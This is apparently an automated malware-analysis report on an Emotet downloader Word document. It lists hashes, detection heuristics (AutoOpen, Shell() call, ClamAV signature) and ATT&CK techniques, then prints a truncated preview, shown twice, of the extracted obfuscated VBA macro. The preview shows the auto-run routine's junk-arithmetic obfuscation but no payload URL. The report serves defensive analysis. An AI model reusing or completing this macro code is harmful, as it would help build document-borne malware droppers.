Emotet Office (OLE) malware analysis — malicious · cae37eb33bbfef6e

MALICIOUS

Office (OLE)

115.2 KB Created: 2018-09-28 09:00:00 Authoring application: Microsoft Office Word First seen: 2019-05-31

MD5: b95761945bc8e52b73064c9cbfdaa488 SHA-1: 277d26788b614afdd4c2815e2bebc9dfe34fa356 SHA-256: cae37eb33bbfef6e1b5cc05d327fb0693f3e8efccb6c53a47bc8951a63e883bc

202 Risk Score

Malware Insights

Emotet · confidence 95%

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing a VBA macro. The AutoOpen macro is present and the critical heuristic firing indicates a Shell() call within the VBA code. ClamAV also identified the file as Doc.Downloader.Emotet-6883996-0, suggesting it acts as a downloader for the Emotet banking trojan. The macro likely attempts to download and execute a second-stage payload.

Heuristics 6

ClamAV: Doc.Downloader.Emotet-6883996-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Emotet-6883996-0
VBA macros detected medium 2 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 68039 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	68039 bytes
SHA-256: `3e68c17b235779a61c2d3e16e550b192108077b0092120c81c1b5400329a8f7b`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "DKjcGJwViMraN" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Sub AutoOpen() Dim fGrPbm(2) fGrPbm(0) = InStrRev(sYLrRB + zRipCzoaPWQYaBoEtFJzr + cBTiXza, RoZZfSRr + GARWWPwDpqUqjmGtrYp + kACPYboR) + InStr(CdLfwOu + HzzwsAfKwUrdmVMOX + YjOiv, KiwXR + mCKOPwiTklEitadvFYOkO + YATXTwEm) fGrPbm(1) = InStr(BAIfXF + sqcOjcQWORYSwJRztRmzvt + jVQiT, VOUKQ + ZcqVaFqqHtLFrhUb + ZGjwcLa) + InStrRev(NMHmrKJa + vpiIoXuQXnpVAWKWz + wtujwlU, HBUjvuz + FQKXJXXRrnzDVRQOHOlaUp + UkaFYRks) Dim GYBdi(1) GYBdi(0) = InStrRev(AtGiXUHT + mUsoqwidCCqvLwhQRwq + mkYrk, XaBjFm + ZWLFAnwuzDYBjvYo + anjim) + InStr(tcchhQ + mlvQdldrZpUZVnhKzifa + tFSWW, LGtKc + UwvzFwqXovirMHKh + jLUKhfJ) Dim YjWIH(1) YjWIH(0) = InStrRev(HiDfCPC + kXUqpidDGqlOhTwUBswHQz + cJRVX, hNXhiqGm + drtBkJShHrDscbBZ + ToZAGFL) + InStrRev(vFtGmFU + HICppzvzpCPFMTDTBdw + EMmsJ, HVJSdjdz + IlWQOsZsbCAEOBlcLC + Butwu) + InStrRev(hEswVKa + WtTQpkHRIThrWPCUWUuwkN + IHtzjRwG, XMRmcBl + qhdtAbFNcvjDvmBIjPv + TzWDjssM) + InStrRev(DQiOsX + bdWzTinSzdmRfaCFCic + VorWUvJ, LUmbU + ZwZtjhJwznpSzumifZ + XqsjVa) Dim jRMoL(2) jRMoL(0) = InStrRev(ihzjN + jrOOwOJsVpKFdGnNPf + NkjiiCh, IGcTRp + lXYqwBrQDrwzHiBiPji + PQCwB) + InStrRev(QbndH + OjrCSzqJAYUOPLDQObhzsb + aVMiaGJm, jPHTGr + hkwFfwZnUhkzbBIMVzNFdQY + JuUqzRth) + InStr(pPEjTp + YFOzDifdUfTmlhsz + hhUNuwwR, PXGzEaKr + RoZCbidTCaqOXtlIThOP + vhHhLW) + InStrRev(fVsIRlNQ + LTZJjIhjjjdDYzzbwIfZu + wPczv, QEGqmz + fwRMCSUIFNpWpfthKREYoj + TtwuCcz) jRMoL(1) = InStrRev(IhjjiGz + NsbZMLLohbZdfAPiLLMZ + lwtwjLGi, WKujki + PCIiCtDiOjVATPbbSIWUuW + VFizdZ) + InStrRev(JpGuA + TsvkSvTEWQsiNHqci + QFwcJ, VUSXGDb + uNalibNsRbcwLdKcpo + pijCzwZp) + InStr(VvPIni + qjrdIWPvdtzJzkDvYPJ + UNdIHDp, wzGCLZM + kwvHFrwXkjQQPJvtHn + OMMAwQZd) + InStrRev(MZWjNIF + fFvWTpmCiSfJhusXtj + BiRIu, nnqcdhTq + IdWzPGzNzSPiXijrBHvDGqf + wbOEzml) ZPaMhdQ (KeyString(EanqCmj + zDhdbn + 15 + 18 + 34 + Ttmzv + nlaoXQBW) + qIhQo + pPLfzit + KeyString(cpZpd + zCRMr + 17 + 21 + 39 + wjlRk + mfULKfEK) + GwGksmJ + JzmFtI + czJcsikBh + flODdO + lYUKh + YFTwwiZ) Dim cMaQIk(2) cMaQIk(0) = InStrRev(zllOP + bFrIThwTiSZVooEHJYcLw + JLvwO, hWrqQ + jwGlpwVzrwmNzts + YlSUPK) + InStr(RKCYYwda + JpJnOEEAXUXITlvflWf + DmoXl, ndTjR + WOSLJsTMFPFMiukuAjbPiT + juiOrP) + InStrRev(RSKVCp + jIfwatQFWDAvwoimAiqY + JcRtJ, aBjVn + nBOJULAdiRCXDJjokQQbWw + atSSEYqw) + InStrRev(hEiMjJ + GVGQKnlKXXZrNqSBLNdhEK + fKYjH, pImKjihF + bZdUOMzHcNcoCbGplnPkw + fPAWiIP) cMaQIk(1) = InStrRev(ktrRzlm + hMUkDDaQcfMojjXwlwFN + Vtkprz, YOLMuL + DsniQvukQOpbzuLiC + YcfwQSk) + InStrRev(LsRuNZs + jpEalKJmMRjASTLD + uKQiDzw, ZCDJVc + rUvGfYCDqQcuOonfowhNEq + PfTjYmU) + InStrRev(ZYOlNbU + rULNPPkrCJGrQHlPKsqZu + VWtaUN, wEbBQD + uSKciHHaDFwnQHAtNDQh + TSDJlHLO) + InStrRev(HjdjNPtA + LkzJLPJiWikOdDqowthVF + iUjzKQQ, iUtwrrBj + WVARXLLUNdPiPvdkM + ZpjUKr) Dim wDkVK(1) wDkVK(0) = InStr(QuKFcOwq + qISCofIJZdYLRmmvUZQM + ipKTBG, jzaMV + bLpUQrsTvzLuVwjmJpw + SQRiUM) + InStrRev(bXsObrVY + rXEuSlHYfiBidUVZEYGbBkX + zELOO, SPYzj + joNaoPtGVzqYkwCKwaYUU + WCGdCshc) Dim sBaoQ(1) sBaoQ(0) = InStrRev(CImGEwa + dXTcvXiDBvKlDBOVcoCF + sVwGJXz, rnXVJU + lOPTRFluiFiibRAqzbtiw + LOotEA) + InStr(RqESbPML + twiPVXiGJQrkSnXFzdFLjK + YbmkQboC, wsROwhNf + lihWpVMokzbGffYAQv + Ezioi) End Sub Attribute VB_Name = "oKjNRrOpOYTW" Function GwGksmJ() Dim UaYRwN(2) UaYRwN(0) = InStrRev(ALSBl + fNoJoifMaXZiTrUTLtu + UTjXWwdS, FotHDtV + cVXjipbhRLZkpUBDJ + EiBNhdjQ) + InStrRev(WknRzkzs + wAjHVrRisRNwfQVzMrQsU + JjskD, qADutsp + ihYJoHECcuUIPEUhIZ + GkFfMwod) + InStrRev(ZiKwtMB + ibQHLUvfXIcsktSYoGNwmtG + SKIjalPM, uKRSwFz + zQdVdZtUcdOEWwObBGUjd + RWnPtnuZ) + InStrRev(ppiGjEv + PpoUGrXzZcjqHXtFj + fWOXpj, CZwRjz + hvBPzXwpPowJLUvKSF + HCcXDni) UaYRwN(1) = InStrRev(iULKhbVj + havWKqvzkmLwwMUbULGVu + zfTtaiSp, LjShS + JGTYNsmBEiFaEVqEbE + sGzNi) + InStrRev(uBTWM + QmmjiZokazLqOQjzzbS + EhwKdm ... (truncated)

SHA-256: 3e68c17b235779a61c2d3e16e550b192108077b0092120c81c1b5400329a8f7b

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "DKjcGJwViMraN"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub AutoOpen()
   Dim fGrPbm(2)
fGrPbm(0) = InStrRev(sYLrRB + zRipCzoaPWQYaBoEtFJzr + cBTiXza, RoZZfSRr + GARWWPwDpqUqjmGtrYp + kACPYboR) + InStr(CdLfwOu + HzzwsAfKwUrdmVMOX + YjOiv, KiwXR + mCKOPwiTklEitadvFYOkO + YATXTwEm)
fGrPbm(1) = InStr(BAIfXF + sqcOjcQWORYSwJRztRmzvt + jVQiT, VOUKQ + ZcqVaFqqHtLFrhUb + ZGjwcLa) + InStrRev(NMHmrKJa + vpiIoXuQXnpVAWKWz + wtujwlU, HBUjvuz + FQKXJXXRrnzDVRQOHOlaUp + UkaFYRks)
   Dim GYBdi(1)
GYBdi(0) = InStrRev(AtGiXUHT + mUsoqwidCCqvLwhQRwq + mkYrk, XaBjFm + ZWLFAnwuzDYBjvYo + anjim) + InStr(tcchhQ + mlvQdldrZpUZVnhKzifa + tFSWW, LGtKc + UwvzFwqXovirMHKh + jLUKhfJ)
   Dim YjWIH(1)
YjWIH(0) = InStrRev(HiDfCPC + kXUqpidDGqlOhTwUBswHQz + cJRVX, hNXhiqGm + drtBkJShHrDscbBZ + ToZAGFL) + InStrRev(vFtGmFU + HICppzvzpCPFMTDTBdw + EMmsJ, HVJSdjdz + IlWQOsZsbCAEOBlcLC + Butwu) + InStrRev(hEswVKa + WtTQpkHRIThrWPCUWUuwkN + IHtzjRwG, XMRmcBl + qhdtAbFNcvjDvmBIjPv + TzWDjssM) + InStrRev(DQiOsX + bdWzTinSzdmRfaCFCic + VorWUvJ, LUmbU + ZwZtjhJwznpSzumifZ + XqsjVa)
   Dim jRMoL(2)
jRMoL(0) = InStrRev(ihzjN + jrOOwOJsVpKFdGnNPf + NkjiiCh, IGcTRp + lXYqwBrQDrwzHiBiPji + PQCwB) + InStrRev(QbndH + OjrCSzqJAYUOPLDQObhzsb + aVMiaGJm, jPHTGr + hkwFfwZnUhkzbBIMVzNFdQY + JuUqzRth) + InStr(pPEjTp + YFOzDifdUfTmlhsz + hhUNuwwR, PXGzEaKr + RoZCbidTCaqOXtlIThOP + vhHhLW) + InStrRev(fVsIRlNQ + LTZJjIhjjjdDYzzbwIfZu + wPczv, QEGqmz + fwRMCSUIFNpWpfthKREYoj + TtwuCcz)
jRMoL(1) = InStrRev(IhjjiGz + NsbZMLLohbZdfAPiLLMZ + lwtwjLGi, WKujki + PCIiCtDiOjVATPbbSIWUuW + VFizdZ) + InStrRev(JpGuA + TsvkSvTEWQsiNHqci + QFwcJ, VUSXGDb + uNalibNsRbcwLdKcpo + pijCzwZp) + InStr(VvPIni + qjrdIWPvdtzJzkDvYPJ + UNdIHDp, wzGCLZM + kwvHFrwXkjQQPJvtHn + OMMAwQZd) + InStrRev(MZWjNIF + fFvWTpmCiSfJhusXtj + BiRIu, nnqcdhTq + IdWzPGzNzSPiXijrBHvDGqf + wbOEzml)
ZPaMhdQ (KeyString(EanqCmj + zDhdbn + 15 + 18 + 34 + Ttmzv + nlaoXQBW) + qIhQo + pPLfzit + KeyString(cpZpd + zCRMr + 17 + 21 + 39 + wjlRk + mfULKfEK) + GwGksmJ + JzmFtI + czJcsikBh + flODdO + lYUKh + YFTwwiZ)
   Dim cMaQIk(2)
cMaQIk(0) = InStrRev(zllOP + bFrIThwTiSZVooEHJYcLw + JLvwO, hWrqQ + jwGlpwVzrwmNzts + YlSUPK) + InStr(RKCYYwda + JpJnOEEAXUXITlvflWf + DmoXl, ndTjR + WOSLJsTMFPFMiukuAjbPiT + juiOrP) + InStrRev(RSKVCp + jIfwatQFWDAvwoimAiqY + JcRtJ, aBjVn + nBOJULAdiRCXDJjokQQbWw + atSSEYqw) + InStrRev(hEiMjJ + GVGQKnlKXXZrNqSBLNdhEK + fKYjH, pImKjihF + bZdUOMzHcNcoCbGplnPkw + fPAWiIP)
cMaQIk(1) = InStrRev(ktrRzlm + hMUkDDaQcfMojjXwlwFN + Vtkprz, YOLMuL + DsniQvukQOpbzuLiC + YcfwQSk) + InStrRev(LsRuNZs + jpEalKJmMRjASTLD + uKQiDzw, ZCDJVc + rUvGfYCDqQcuOonfowhNEq + PfTjYmU) + InStrRev(ZYOlNbU + rULNPPkrCJGrQHlPKsqZu + VWtaUN, wEbBQD + uSKciHHaDFwnQHAtNDQh + TSDJlHLO) + InStrRev(HjdjNPtA + LkzJLPJiWikOdDqowthVF + iUjzKQQ, iUtwrrBj + WVARXLLUNdPiPvdkM + ZpjUKr)
   Dim wDkVK(1)
wDkVK(0) = InStr(QuKFcOwq + qISCofIJZdYLRmmvUZQM + ipKTBG, jzaMV + bLpUQrsTvzLuVwjmJpw + SQRiUM) + InStrRev(bXsObrVY + rXEuSlHYfiBidUVZEYGbBkX + zELOO, SPYzj + joNaoPtGVzqYkwCKwaYUU + WCGdCshc)
   Dim sBaoQ(1)
sBaoQ(0) = InStrRev(CImGEwa + dXTcvXiDBvKlDBOVcoCF + sVwGJXz, rnXVJU + lOPTRFluiFiibRAqzbtiw + LOotEA) + InStr(RqESbPML + twiPVXiGJQrkSnXFzdFLjK + YbmkQboC, wsROwhNf + lihWpVMokzbGffYAQv + Ezioi)
End Sub


Attribute VB_Name = "oKjNRrOpOYTW"
Function GwGksmJ()
Dim UaYRwN(2)
UaYRwN(0) = InStrRev(ALSBl + fNoJoifMaXZiTrUTLtu + UTjXWwdS, FotHDtV + cVXjipbhRLZkpUBDJ + EiBNhdjQ) + InStrRev(WknRzkzs + wAjHVrRisRNwfQVzMrQsU + JjskD, qADutsp + ihYJoHECcuUIPEUhIZ + GkFfMwod) + InStrRev(ZiKwtMB + ibQHLUvfXIcsktSYoGNwmtG + SKIjalPM, uKRSwFz + zQdVdZtUcdOEWwObBGUjd + RWnPtnuZ) + InStrRev(ppiGjEv + PpoUGrXzZcjqHXtFj + fWOXpj, CZwRjz + hvBPzXwpPowJLUvKSF + HCcXDni)
UaYRwN(1) = InStrRev(iULKhbVj + havWKqvzkmLwwMUbULGVu + zfTtaiSp, LjShS + JGTYNsmBEiFaEVqEbE + sGzNi) + InStrRev(uBTWM + QmmjiZokazLqOQjzzbS + EhwKdm
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.